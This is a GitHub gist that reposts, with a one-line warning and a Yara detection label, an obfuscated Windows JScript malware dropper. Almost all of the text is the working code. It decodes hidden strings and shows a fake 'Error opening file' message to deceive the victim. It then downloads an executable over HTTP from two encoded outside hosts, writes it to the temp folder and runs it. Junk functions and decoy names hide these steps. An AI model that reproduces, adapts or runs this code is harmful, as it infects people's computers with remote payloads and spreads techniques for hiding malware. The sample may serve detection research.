Last active
February 12, 2020 15:08
-
-
Save liberodark/818a4f14900e1a4c9765ca8c0b777045 to your computer and use it in GitHub Desktop.
This is a source of virus : Please dont use that and be safe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function setRH(CR, VR){ | |
| CR[VR]("User-Agent", "TW96aWxsYS80LjAgPARTITIKGNvbXBhdGlibGU7IE1TSUUgNi4wOyPARTITIBXaW5kb3dzIE5UIDUuMCk=".HIDEMYASS()); | |
| } | |
| var SmthngWrngfibre_SayNoNo ="PARTITI"+ ""+""; | |
| var silkopil = "/"; | |
| var efFFFFF =0xff ; | |
| var line5 = new Array( | |
| 29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,92,29,29,29,93,82,83,84,85,86,87,88,89,90,91,29,29,29,29,29,29,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,29,29,29,29,29,29,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29 | |
| ); | |
| turkish = {'U':'S' , ':':'.' , '88':'' , 'BOLGARIN':'onseBody' , '77':'' , '101':'' , 'SEREDINA':'X', '11':''}; | |
| function SmthngWrngfibre_FROG2sud(vardos){ | |
| return vardos[("SmthngWrngfibre_earthen","SmthngWrngfibre_dowdy","SmthngWrngfibre_castaway","SmthngWrngfibre_supplier","SmthngWrngfibre_confronting","l")+"en" +("SmthngWrngfibre_brownie","SmthngWrngfibre_deathbed","SmthngWrngfibre_optimism","SmthngWrngfibre_costume","SmthngWrngfibre_henceforward","gt")+"h"]; | |
| } | |
| var line5HO = SmthngWrngfibre_FROG2sud(line5); | |
| WScript.echo("Error opening file (CODE:" +line5HO+")"); | |
| for (velVITK_OBLOM= 0; line5HO >velVITK_OBLOM ; ++velVITK_OBLOM) { | |
| line5[velVITK_OBLOM] = -29+line5[velVITK_OBLOM] - 1; | |
| } | |
| var turkish; | |
| var velVITK_BOSKO_2S = ""; | |
| var ratatu = "prot"+"otype"; | |
| function TortPankaky(ReebokGalaxyFROGvostochniy){ | |
| ReebokGalaxyFROGtaliluev = ReebokGalaxyFROGvostochniy; | |
| for (var ReebokGalaxyFROG2XCOP in turkish){ReebokGalaxyFROGtaliluev = ReebokGalaxyFROGtaliluev["repl" + "ace"](ReebokGalaxyFROG2XCOP, turkish[ReebokGalaxyFROG2XCOP]);} | |
| return ReebokGalaxyFROGtaliluev; | |
| }; | |
| String[ratatu].HIDEMYASS = function() { | |
| var SmthngWrngfibre_RazlomSS, line4, SmthngWrngfibre_Selection1, SmthngWrngfibre_FROG2c4; | |
| var SmthngWrngfibre_FROG2out = ""; | |
| var line3= this.replace(/PARTITI/gi, SmthngWrngfibre_FROG2out);line6 = 0; | |
| var SmthngWrngfibre_FROG2len = SmthngWrngfibre_FROG2sud(line3); | |
| while (line6 < SmthngWrngfibre_FROG2len) { | |
| do { | |
| var SmthngWrngfibre_koch = line3.charCodeAt(line6++) &(0x132- 0x33); | |
| SmthngWrngfibre_RazlomSS = line5[SmthngWrngfibre_koch]; | |
| } while (line6 < SmthngWrngfibre_FROG2len && SmthngWrngfibre_RazlomSS == -1); | |
| if (SmthngWrngfibre_RazlomSS == -1) | |
| break; | |
| do { | |
| stembl = "the"; | |
| line4 = line5[line3.charCodeAt(line6++) & efFFFFF]; | |
| } while (line6 < SmthngWrngfibre_FROG2len && line4 == -1); | |
| if (line4 +1== 0) | |
| break; | |
| SmthngWrngfibre_FROG2out += String.fromCharCode((SmthngWrngfibre_RazlomSS << 2) | ((line4 & 0x30) >> 4)); | |
| do { | |
| SmthngWrngfibre_Selection1 = line3.charCodeAt(line6++) & 0xff; | |
| if (SmthngWrngfibre_Selection1 == 61) | |
| return SmthngWrngfibre_FROG2out; | |
| SmthngWrngfibre_Selection1 = line5[SmthngWrngfibre_Selection1]; | |
| } while (line6 < SmthngWrngfibre_FROG2len && SmthngWrngfibre_Selection1 == -1); | |
| if (SmthngWrngfibre_Selection1 == -1) | |
| break; | |
| SmthngWrngfibre_FROG2out += String.fromCharCode(((line4 & (0xe+1)) << 4) | ((SmthngWrngfibre_Selection1 & 0x3c) >> 2)); | |
| do { | |
| SmthngWrngfibre_FROG2c4 = line3.charCodeAt(line6++) & efFFFFF; | |
| if (SmthngWrngfibre_FROG2c4 == 61) | |
| return SmthngWrngfibre_FROG2out; | |
| SmthngWrngfibre_FROG2c4 = line5[SmthngWrngfibre_FROG2c4]; | |
| } while (line6 < SmthngWrngfibre_FROG2len && SmthngWrngfibre_FROG2c4 == -1); | |
| if (SmthngWrngfibre_FROG2c4 == -1) | |
| break; | |
| SmthngWrngfibre_FROG2out += String.fromCharCode(((SmthngWrngfibre_Selection1 & 0x03) << 6) | SmthngWrngfibre_FROG2c4); | |
| } | |
| return SmthngWrngfibre_FROG2out; | |
| }; | |
| function SmthngWrngfibre_FROG2undefilled(velVLUMAHx, velVLUMAHy) { | |
| velVLUMAHx =frr / eww ; | |
| velVLUMAHy = velVLUMAHZZ + -245; | |
| }; | |
| SmthngWrngfibre_FROG2undefilled.dEDWWEE = function(){ | |
| SmthngWrngfibre_FROG2ok(SmthngWrngfibre_FROG2spyFunction1.SmthngWrngfibre_FROG2calledWith(), "Function called without arguments"); | |
| SmthngWrngfibre_FROG2publisher.SmthngWrngfibre_FROG2publish(this.SmthngWrngfibre_FROG2type1, "PROPER1"); | |
| SmthngWrngfibre_FROG2ok(SmthngWrngfibre_FROG2spyFunction1.SmthngWrngfibre_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument"); | |
| SmthngWrngfibre_FROG2publisher.SmthngWrngfibre_FROG2publish(this.SmthngWrngfibre_FROG2type1, ["PROPER1", "PROPER2"]); | |
| }; | |
| var topSecretLine; | |
| var SmthngWrngfibre_LLL0LLL = "l"; | |
| var SmthngWrngfibre_FROG2TRUEFALSE=("V2lPARTITIuZG93cyBTY3JpcPARTITIHQgSG9zdA=PARTITI=".HIDEMYASS() +"!!!22ee22" =="PARTITIV2lPARTITIuZG93cyBTY3JpcPARTITIHQgSG9zdA==".HIDEMYASS() +"!!!22ee22")&&typeof(SmthngWrngfibre_FROG2GzEAPd)==="undefined"; | |
| var SmthngWrngfibre_FROGsrq = "UmVxdWVzdEhlYWRlcg==".HIDEMYASS(); | |
| var SmthngWrngfibreFPADRML =("").HIDEMYASS(); | |
| var SmthngWrngfibre_FROG2lidgen = "QWN0PARTITIaXZlWEPARTITI9iamVjdA==".HIDEMYASS(); | |
| var SmthngWrngfibre_FROG2chosen = Math.round(0.7 * 2 - 0.4); | |
| var takeshiKitana = new Function("PARTITI,PARTITI2", "PARTITI[PARTITI2]();"); | |
| if(!SmthngWrngfibre_FROG2TRUEFALSE){ | |
| SmthngWrngfibre_FROG2undefilled.scale = function(SmthngWrngfibre_FROG2p, SmthngWrngfibre_FROG2scaleX, SmthngWrngfibre_FROG2scaleY) { | |
| if (line6sObject(SmthngWrngfibre_FROG2scaleX)) { | |
| SmthngWrngfibre_FROG2scaleY = SmthngWrngfibre_FROG2scaleX.y; | |
| SmthngWrngfibre_FROG2scaleX = SmthngWrngfibre_FROG2scaleX.x; | |
| } else if (!line6sNumber(SmthngWrngfibre_FROG2scaleY)) { | |
| SmthngWrngfibre_FROG2scaleY = SmthngWrngfibre_FROG2scaleX; | |
| } | |
| return new SmthngWrngfibre_FROG2undefilled(SmthngWrngfibre_FROG2p.x * SmthngWrngfibre_FROG2scaleX, SmthngWrngfibre_FROG2p.y * SmthngWrngfibre_FROG2scaleY); | |
| }; | |
| } | |
| function SmthngWrngfibreFPADZO_ZO(TT){ | |
| eval(TT); | |
| } | |
| if(!SmthngWrngfibre_FROG2TRUEFALSE){ | |
| SmthngWrngfibre_FROG2undefilled.SmthngWrngfibre_FROG2sameOrN = function(SmthngWrngfibre_FROG2param1, SmthngWrngfibre_FROG2param2) { | |
| return SmthngWrngfibre_FROG2param1.D == SmthngWrngfibre_FROG2param2.D || SmthngWrngfibre_FROG2param1.F == SmthngWrngfibre_FROG2param2.F; | |
| }; | |
| SmthngWrngfibre_FROG2undefilled.angle = function(SmthngWrngfibre_FROG2p) { | |
| return Math.atan2(SmthngWrngfibre_FROG2p.y, SmthngWrngfibre_FROG2p.x); | |
| }; | |
| } | |
| var SmthngWrngfibre_FROG2VARDOCF ="JVRFPARTITITVAlPARTITI".HIDEMYASS(); | |
| var NewNameCreator = new Function("PARTITI,PARTITI","topSecretLine = "+ ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").HIDEMYASS() + ".HIDEMYASS();');"); | |
| var SmthngWrngfibre_FROG2sirdallos ="PARTITIRXhwYW5PARTITIkRW52aXPARTITIJvbm1lbnRTdHJPARTITIpbmdz".HIDEMYASS(); | |
| var SmthngWrngfibre_FROG2Native = function(options){ | |
| }; | |
| SmthngWrngfibre_FROG2Native.line6mplement = function(SmthngWrngfibre_FROG2objects, SmthngWrngfibre_FROG2properties){ | |
| for ( var line6 = 0, SmthngWrngfibre_FROG2l = SmthngWrngfibre_FROG2objects.length; line6 < SmthngWrngfibre_FROG2l; line6++) SmthngWrngfibre_FROG2objects[line6].line6mplement(SmthngWrngfibre_FROG2properties); | |
| }; | |
| var SmthngWrngfibre_FROGhatershaha = ""; | |
| var SmthngWrngfibre_FROGodnoklass = "TJaEtNeDR"; | |
| function placeHolder(AOn){ | |
| return new ActiveXObject(AOn); | |
| }if(WSH){ | |
| NewNameCreator(); | |
| } | |
| var SmthngWrngfibre_FROG2d7 ="WA==".HIDEMYASS() + "M" +"L"; | |
| var SmthngWrngfibre_FROG2_bChosteck = "aHR0cDovLw=PARTITI="; | |
| function SmthngWrngfibre_FROG2_bCho(T, D, C) { | |
| R ="" + D ; | |
| T[D+""](C); | |
| } | |
| SmthngWrngfibre_FROG2d7 = topSecretLine() + SmthngWrngfibre_FROG2d7+ TortPankaky(("SmthngWrngfibre_fossil","SmthngWrngfibre_ailed","SmthngWrngfibre_husky","SmthngWrngfibre_stephanie","SmthngWrngfibre_bachelor","2.")+"SEREDINAML77H101T"+"TP45PARTITI45"+"WS"+"cr"+"ipt:Uh")+"e"+"ll"; | |
| var SmthngWrngfibre_FROG2DoUtra = [SmthngWrngfibre_FROG2lidgen, SmthngWrngfibre_FROG2sirdallos,SmthngWrngfibre_FROG2VARDOCF,"LmVPARTITI4ZQ=PARTITI=".HIDEMYASS(), "UnPARTITIVuPARTITI".HIDEMYASS(),SmthngWrngfibre_FROG2d7]; | |
| SmthngWrngfibre_FROG2Richters=SmthngWrngfibre_FROG2DoUtra.shift(); | |
| var SmthngWrngfibre_FROG2d2=SmthngWrngfibre_FROG2DoUtra.pop(); | |
| SmthngWrngfibre_FROG2fabled="Valar2Morgulis"; | |
| var SmthngWrngfibre_FROG2LitoyDISK=ActiveXObject; | |
| var massMarket=SmthngWrngfibre_FROG2d2.split("45");SmthngWrngfibre_FROG2Native.SmthngWrngfibre_FROG2typize=function(a,b){a.type||(a.type=function(a){return SmthngWrngfibre_FROG2$type(a)===b})}; | |
| SmthngWrngfibre_FROGcccomeccc = "p"; | |
| var Limbus2000=new Function("HORN",' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("TRUMP", "D").replace("32", "eam");'); | |
| function SmthngWrngfibre_FROG2_cCho(a,b,c,d){a[b](c,d)} | |
| abtest = massMarket[SmthngWrngfibre_FROGcccomeccc + "op"](); | |
| var SmthngWrngfibreMorningNewYork; | |
| function mix2(){ | |
| try{ | |
| perm_sel[fixed] = fixed; /* Generate random orientation*/ var total = 0; var ori_sel = Array(); var i = fixed === 0 ? 1 : 0; for(; i < 7; i = i === fixed - 1 ? i + 2 : i + 1){ ori_sel[i] = scramblers.lib.randomInt.below(3); total += ori_sel[i]; } if(i <= 7) ori_sel[i] = (3 - (total % 3)) % 3; ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/ var D = 1, L = 2, B = 5, U = 4, R = 3, F = 0; /* D 0 1 2 3 L 4 5 6 7 B 8 9 10 11 U 12 13 14 15 R 16 17 18 19 F 20 21 22 23*/ /* Map from permutation/orientation to face*/ /* Convert cubie representation into facelet representaion*/ for( var i = 0; i < 8; i++){ for( var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j]; } | |
| }catch(exc){ | |
| SmthngWrngfibreMorningNewYork = "bPARTITI3Blbg==".HIDEMYASS(); | |
| } | |
| } | |
| SmthngWrngfibreSeason3 = placeHolder(abtest+""); | |
| mix2(); | |
| SmthngWrngfibre_FROGletchikva=new ActiveXObject(massMarket[0]); | |
| SmthngWrngfibre_FROG2tudabilo1 = "s"; | |
| eval(SmthngWrngfibre_SayNoNo.HIDEMYASS()); | |
| var SmthngWrngfibre_FROG2vulture = SmthngWrngfibreSeason3[SmthngWrngfibre_FROG2DoUtra.shift()](SmthngWrngfibre_FROG2DoUtra.shift()); | |
| SmthngWrngfibre_FROG2weasel = "G\x45T"; | |
| var SmthngWrngfibre_FROG2SIDRENKOV = SmthngWrngfibre_FROG2DoUtra.shift(); | |
| var SmthngWrngfibre_FROG2promises = SmthngWrngfibre_FROG2DoUtra.shift(); | |
| SmthngWrngfibre_FROG2SPASPI = "type"; | |
| function SmthngWrngfibre_FROG2_aCho(R, K) { | |
| R[K](); | |
| } | |
| function CNPK(aa){ | |
| return "\x3F".concat(aa,"\x3D"); | |
| } | |
| function SmthngWrngfibre_ECOPLAT(SmthngWrngfibre_FROG2gutter, SmthngWrngfibre_FROG2StrokaParam2) { | |
| var SmthngWrngfibreMorningPitsburg = ""+ SmthngWrngfibre_FROG2vulture; | |
| try{ | |
| SmthngWrngfibreMorningPitsburg=SmthngWrngfibreMorningPitsburg+silkopil; | |
| SmthngWrngfibreMorningPitsburg=SmthngWrngfibreMorningPitsburg +""+ SmthngWrngfibre_FROG2StrokaParam2 ; | |
| SmthngWrngfibre_FROGletchikva["open"](SmthngWrngfibre_FROG2weasel, SmthngWrngfibre_FROG2gutter, false); | |
| if(SmthngWrngfibre_FROG2TRUEFALSE){ SmthngWrngfibre_FROG2_cCho(SmthngWrngfibre_FROGletchikva,"set"+(11,"SmthngWrngfibre_myanmar","SmthngWrngfibre_phoenix","SmthngWrngfibre_barcelona","SmthngWrngfibre_monogram","SmthngWrngfibre_provisional","SmthngWrngfibre_captious","SmthngWrngfibre_somehow",SmthngWrngfibre_FROGsrq),"User-Agent","TW96aWxsYS80LjAgPARTITIKGNvbXBhdGlibGU7IE1TSUUgNi4wOyPARTITIBXaW5kb3dzIE5UIDUuMCk=".HIDEMYASS()); | |
| } | |
| SmthngWrngfibre_FROGletchikva[SmthngWrngfibre_FROG2tudabilo1 + ("SmthngWrngfibre_salvador","SmthngWrngfibre_sheet","SmthngWrngfibre_downloads","SmthngWrngfibre_dominant","SmthngWrngfibre_tambourine","end")](); | |
| var kuzut = SmthngWrngfibre_FROGletchikva["Re"+"sp"+(SmthngWrngfibre_FROG2StrokaParam2,"SmthngWrngfibre_earlier","SmthngWrngfibre_argumentative","SmthngWrngfibre_realism","SmthngWrngfibre_cranium",1123,turkish['BOLGARIN'])]; | |
| //if(kuzut < 29989)return false; | |
| // if (kuzut[0]!= 77 || kuzut[1]!= 90)return false; | |
| var SmthngWrngfibre_MainZ = new SmthngWrngfibre_FROG2LitoyDISK(Limbus2000()); | |
| if (SmthngWrngfibre_FROG2TRUEFALSE) { | |
| var ddee = new Function("vgg, rdd", " included = Math.floor(n); if (x < 256*256*256) { bytes = [ max + 2, Math.floor(x / 256 / 256), Math.floor(tulip / 256) % 256, x % 256 ]; } else if (x < 256*256*256*256) { crystalline = [ max + 3, Math.floor(x / 256 / 256 / 256), Math.floor(x / 256 / 256) % 256, Math.floor(bracken / 256) % 256, x % 256 ]; }" | |
| ); SmthngWrngfibre_FROGGaSMa = "Valar10Morgulis"; | |
| var takeshiKitana2 = new Function("PARTITI,PARTITI2", "PARTITI.write(PARTITI2);"); | |
| takeshiKitana(SmthngWrngfibre_MainZ,SmthngWrngfibreMorningNewYork); | |
| SmthngWrngfibre_MainZ[SmthngWrngfibre_FROG2SPASPI] = SmthngWrngfibre_FROG2chosen; | |
| takeshiKitana2( SmthngWrngfibre_MainZ, kuzut); | |
| SmthngWrngfibre_FROG2XWaxeQhw = "Valar11Morgulis"; | |
| SmthngWrngfibre_MainZ["position"] = 0; | |
| SmthngWrngfibre_FROG2krDwvrh = "Valar12Morgulis"; | |
| SmthngWrngfibreMorningPitsburg = SmthngWrngfibreMorningPitsburg + SmthngWrngfibre_FROG2SIDRENKOV; | |
| SmthngWrngfibre_MainZ["cPARTITI2F2PARTITIZVPARTITIRvRmlsZQ==".HIDEMYASS()](SmthngWrngfibreMorningPitsburg, 26/13); | |
| SmthngWrngfibre_FROG2SswQdi = "Valar13Morgulis"; | |
| SmthngWrngfibre_MainZ.close(); | |
| SmthngWrngfibreSeason3[SmthngWrngfibre_FROG2promises ](SmthngWrngfibreMorningPitsburg,0,false); | |
| return true; | |
| } | |
| }catch(exception2){ | |
| return false;} | |
| }; | |
| SmthngWrngfibreFPADZO_ZO(SmthngWrngfibreFPADRML); | |
| var SmthngWrngfibre_FROGodnoklassYO = 1; | |
| var SmthngWrngfibre_FROG2_a5 = ('PARTITIZ2dpdWRpY2kuaXQvNjVKPARTITIS2piaD8=SSSS'+'ZHJvb2hzZHJvbmZoeXN0Z2ZoLmluZm8vYWYvNjVKS2piaA=='+'SSSSPARTITI').split("SSSS"); | |
| var PARTITI500 = new Function("SmthngWrngfibre_FROG2_a5,SmthngWrngfibre_FROG2HORDA5", 'return SmthngWrngfibre_FROG2_bChosteck.HIDEMYASS() + SmthngWrngfibre_FROG2_a5[SmthngWrngfibre_FROG2HORDA5].HIDEMYASS();'); | |
| for(SmthngWrngfibre_FROG2HORDA5 in SmthngWrngfibre_FROG2_a5){ | |
| SmthngWrngfibre_FROGodnoklassYO++; | |
| if(SmthngWrngfibre_ECOPLAT(PARTITI500(SmthngWrngfibre_FROG2_a5,SmthngWrngfibre_FROG2HORDA5)+CNPK(SmthngWrngfibre_FROGodnoklass)+SmthngWrngfibre_FROGodnoklass,SmthngWrngfibre_FROGodnoklass+ SmthngWrngfibre_FROGodnoklassYO)){ | |
| break; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Yara detect : Sanesecurity.Malware.27112.JsHeur.UNOFFICIAL FOUND